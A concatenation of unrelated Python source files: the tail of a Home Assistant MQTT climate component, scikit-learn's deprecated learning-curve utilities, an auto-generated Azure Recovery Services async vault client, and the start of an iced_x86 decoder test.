mqtt.async_publish(self.hass, self._topic[CONF_AUX_COMMAND_TOPIC],
self._payload_off, self._qos, self._retain)
if self._topic[CONF_AUX_STATE_TOPIC] is None:
self._aux = False
self.async_schedule_update_ha_state()
@property
def supported_features(self):
"""Return the list of supported features."""
support = 0
if (self._topic[CONF_TEMPERATURE_STATE_TOPIC] is not None) or \
(self._topic[CONF_TEMPERATURE_COMMAND_TOPIC] is not None):
support |= SUPPORT_TARGET_TEMPERATURE
if (self._topic[CONF_MODE_COMMAND_TOPIC] is not None) or \
(self._topic[CONF_MODE_STATE_TOPIC] is not None):
support |= SUPPORT_OPERATION_MODE
if (self._topic[CONF_FAN_MODE_STATE_TOPIC] is not None) or \
(self._topic[CONF_FAN_MODE_COMMAND_TOPIC] is not None):
support |= SUPPORT_FAN_MODE
if (self._topic[CONF_SWING_MODE_STATE_TOPIC] is not None) or \
(self._topic[CONF_SWING_MODE_COMMAND_TOPIC] is not None):
support |= SUPPORT_SWING_MODE
if (self._topic[CONF_AWAY_MODE_STATE_TOPIC] is not None) or \
(self._topic[CONF_AWAY_MODE_COMMAND_TOPIC] is not None):
support |= SUPPORT_AWAY_MODE
if (self._topic[CONF_HOLD_STATE_TOPIC] is not None) or \
(self._topic[CONF_HOLD_COMMAND_TOPIC] is not None):
support |= SUPPORT_HOLD_MODE
if (self._topic[CONF_AUX_STATE_TOPIC] is not None) or \
(self._topic[CONF_AUX_COMMAND_TOPIC] is not None):
support |= SUPPORT_AUX_HEAT
return support
|
|
"""Utilities to evaluate models with respect to a variable
"""
# Author: Alexander Fabisch <afabisch@informatik.uni-bremen.de>
#
# License: BSD 3 clause
import warnings
import numpy as np
from .base import is_classifier, clone
from .cross_validation import check_cv
from .externals.joblib import Parallel, delayed
from .cross_validation import _safe_split, _score, _fit_and_score
from .metrics.scorer import check_scoring
from .utils import indexable
from .utils.fixes import astype
warnings.warn("This module was deprecated in version 0.18 in favor of the "
"model_selection module into which all the functions are moved."
" This module will be removed in 0.20",
DeprecationWarning)
__all__ = ['learning_curve', 'validation_curve']
def learning_curve(estimator, X, y, train_sizes=np.linspace(0.1, 1.0, 5),
cv=None, scoring=None, exploit_incremental_learning=False,
n_jobs=1, pre_dispatch="all", verbose=0,
error_score='raise'):
"""Learning curve.
Determines cross-validated training and test scores for different training
set sizes.
A cross-validation generator splits the whole dataset k times in training
and test data. Subsets of the training set with varying sizes will be used
to train the estimator and a score for each training subset size and the
test set will be computed. Afterwards, the scores will be averaged over
all k runs for each training subset size.
Read more in the :ref:`User Guide <learning_curves>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
train_sizes : array-like, shape (n_ticks,), dtype float or int
Relative or absolute numbers of training examples that will be used to
generate the learning curve. If the dtype is float, it is regarded as a
fraction of the maximum size of the training set (that is determined
by the selected validation method), i.e. it has to be within (0, 1].
Otherwise it is interpreted as absolute sizes of the training sets.
Note that for classification the number of samples usually have to
be big enough to contain at least one sample from each class.
(default: np.linspace(0.1, 1.0, 5))
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
exploit_incremental_learning : boolean, optional, default: False
If the estimator supports incremental learning, this will be
used to speed up fitting for different training set sizes.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Returns
-------
train_sizes_abs : array, shape = (n_unique_ticks,), dtype int
Numbers of training examples that has been used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See :ref:`examples/model_selection/plot_learning_curve.py
<sphx_glr_auto_examples_model_selection_plot_learning_curve.py>`
"""
if exploit_incremental_learning and not hasattr(estimator, "partial_fit"):
raise ValueError("An estimator must support the partial_fit interface "
"to exploit incremental learning")
X, y = indexable(X, y)
# Make a list since we will be iterating multiple times over the folds
cv = list(check_cv(cv, X, y, classifier=is_classifier(estimator)))
scorer = check_scoring(estimator, scoring=scoring)
# HACK as long as boolean indices are allowed in cv generators
if cv[0][0].dtype == bool:
new_cv = []
for i in range(len(cv)):
new_cv.append((np.nonzero(cv[i][0])[0], np.nonzero(cv[i][1])[0]))
cv = new_cv
n_max_training_samples = len(cv[0][0])
# Because the lengths of folds can be significantly different, it is
# not guaranteed that we use all of the available training data when we
# use the first 'n_max_training_samples' samples.
train_sizes_abs = _translate_train_sizes(train_sizes,
n_max_training_samples)
n_unique_ticks = train_sizes_abs.shape[0]
if verbose > 0:
print("[learning_curve] Training set sizes: " + str(train_sizes_abs))
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
if exploit_incremental_learning:
classes = np.unique(y) if is_classifier(estimator) else None
out = parallel(delayed(_incremental_fit_estimator)(
clone(estimator), X, y, classes, train, test, train_sizes_abs,
scorer, verbose) for train, test in cv)
else:
out = parallel(delayed(_fit_and_score)(
clone(estimator), X, y, scorer, train[:n_train_samples], test,
verbose, parameters=None, fit_params=None, return_train_score=True,
error_score=error_score)
for train, test in cv for n_train_samples in train_sizes_abs)
out = np.array(out)[:, :2]
n_cv_folds = out.shape[0] // n_unique_ticks
out = out.reshape(n_cv_folds, n_unique_ticks, 2)
out = np.asarray(out).transpose((2, 1, 0))
return train_sizes_abs, out[0], out[1]
def _translate_train_sizes(train_sizes, n_max_training_samples):
"""Determine absolute sizes of training subsets and validate 'train_sizes'.
Examples:
_translate_train_sizes([0.5, 1.0], 10) -> [5, 10]
_translate_train_sizes([5, 10], 10) -> [5, 10]
Parameters
----------
train_sizes : array-like, shape (n_ticks,), dtype float or int
Numbers of training examples that will be used to generate the
learning curve. If the dtype is float, it is regarded as a
fraction of 'n_max_training_samples', i.e. it has to be within (0, 1].
n_max_training_samples : int
Maximum number of training samples (upper bound of 'train_sizes').
Returns
-------
train_sizes_abs : array, shape (n_unique_ticks,), dtype int
Numbers of training examples that will be used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
"""
train_sizes_abs = np.asarray(train_sizes)
n_ticks = train_sizes_abs.shape[0]
n_min_required_samples = np.min(train_sizes_abs)
n_max_required_samples = np.max(train_sizes_abs)
if np.issubdtype(train_sizes_abs.dtype, np.float):
if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0:
raise ValueError("train_sizes has been interpreted as fractions "
"of the maximum number of training samples and "
"must be within (0, 1], but is within [%f, %f]."
% (n_min_required_samples,
n_max_required_samples))
train_sizes_abs = astype(train_sizes_abs * n_max_training_samples,
dtype=np.int, copy=False)
train_sizes_abs = np.clip(train_sizes_abs, 1,
n_max_training_samples)
else:
if (n_min_required_samples <= 0 or
n_max_required_samples > n_max_training_samples):
raise ValueError("train_sizes has been interpreted as absolute "
"numbers of training samples and must be within "
"(0, %d], but is within [%d, %d]."
% (n_max_training_samples,
n_min_required_samples,
n_max_required_samples))
train_sizes_abs = np.unique(train_sizes_abs)
if n_ticks > train_sizes_abs.shape[0]:
warnings.warn("Removed duplicate entries from 'train_sizes'. Number "
"of ticks will be less than the size of "
"'train_sizes' %d instead of %d)."
% (train_sizes_abs.shape[0], n_ticks), RuntimeWarning)
return train_sizes_abs
def _incremental_fit_estimator(estimator, X, y, classes, train, test,
train_sizes, scorer, verbose):
"""Train estimator on training subsets incrementally and compute scores."""
train_scores, test_scores = [], []
partitions = zip(train_sizes, np.split(train, train_sizes)[:-1])
for n_train_samples, partial_train in partitions:
train_subset = train[:n_train_samples]
X_train, y_train = _safe_split(estimator, X, y, train_subset)
X_partial_train, y_partial_train = _safe_split(estimator, X, y,
partial_train)
X_test, y_test = _safe_split(estimator, X, y, test, train_subset)
if y_partial_train is None:
estimator.partial_fit(X_partial_train, classes=classes)
else:
estimator.partial_fit(X_partial_train, y_partial_train,
classes=classes)
train_scores.append(_score(estimator, X_train, y_train, scorer))
test_scores.append(_score(estimator, X_test, y_test, scorer))
return np.array((train_scores, test_scores)).T
def validation_curve(estimator, X, y, param_name, param_range, cv=None,
scoring=None, n_jobs=1, pre_dispatch="all", verbose=0):
"""Validation curve.
Determine training and test scores for varying parameter values.
Compute scores for an estimator with different values of a specified
parameter. This is similar to grid search with one parameter. However, this
will also compute training scores and is merely a utility for plotting the
results.
Read more in the :ref:`User Guide <validation_curve>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
param_name : string
Name of the parameter that will be varied.
param_range : array-like, shape (n_values,)
The values of the parameter that will be evaluated.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
Returns
-------
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See
:ref:`examples/model_selection/plot_validation_curve.py
<sphx_glr_auto_examples_model_selection_plot_validation_curve.py>`
"""
X, y = indexable(X, y)
cv = check_cv(cv, X, y, classifier=is_classifier(estimator))
scorer = check_scoring(estimator, scoring=scoring)
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
out = parallel(delayed(_fit_and_score)(
estimator, X, y, scorer, train, test, verbose,
parameters={param_name: v}, fit_params=None, return_train_score=True)
for train, test in cv for v in param_range)
out = np.asarray(out)[:, :2]
n_params = len(param_range)
n_cv_folds = out.shape[0] // n_params
out = out.reshape(n_cv_folds, n_params, 2).transpose((2, 1, 0))
return out[0], out[1]
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VaultsOperations:
"""VaultsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.recoveryservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_subscription_id(
self,
**kwargs: Any
) -> AsyncIterable["_models.VaultList"]:
"""Fetches all the resources of the specified type in the subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VaultList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservices.models.VaultList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VaultList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription_id.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VaultList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription_id.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.RecoveryServices/vaults'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.VaultList"]:
"""Retrieve a list of Vaults.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VaultList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservices.models.VaultList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VaultList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VaultList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults'} # type: ignore
async def get(
self,
resource_group_name: str,
vault_name: str,
**kwargs: Any
) -> "_models.Vault":
"""Get the Vault details.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Vault, or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservices.models.Vault
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.Vault",
**kwargs: Any
) -> "_models.Vault":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vault, 'Vault')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Vault', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.Vault",
**kwargs: Any
) -> AsyncLROPoller["_models.Vault"]:
"""Creates or updates a Recovery Services vault.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param vault: Recovery Services Vault to be created.
:type vault: ~azure.mgmt.recoveryservices.models.Vault
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Vault or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.recoveryservices.models.Vault]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
vault_name=vault_name,
vault=vault,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
vault_name: str,
**kwargs: Any
) -> None:
"""Deletes a vault.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.PatchVault",
**kwargs: Any
) -> Optional["_models.Vault"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.Vault"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vault, 'PatchVault')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def begin_update(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.PatchVault",
**kwargs: Any
) -> AsyncLROPoller["_models.Vault"]:
"""Updates the vault.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param vault: Recovery Services Vault to be created.
:type vault: ~azure.mgmt.recoveryservices.models.PatchVault
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Vault or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.recoveryservices.models.Vault]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
vault_name=vault_name,
vault=vault,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
|
|
#
# SPDX-License-Identifier: MIT
# Copyright wtfsckgh@gmail.com
# Copyright iced contributors
#
import copy
import pytest
from iced_x86 import *
def test_ctor():
instr = Instruction()
assert instr.code == Code.INVALID
assert instr.code_size == CodeSize.UNKNOWN
assert instr.len == 0
assert instr.ip == 0
def test_eq_ne_hash():
decodera = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41" b"\xC4\xE3\x49\x48\x10\x42")
decoderb = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
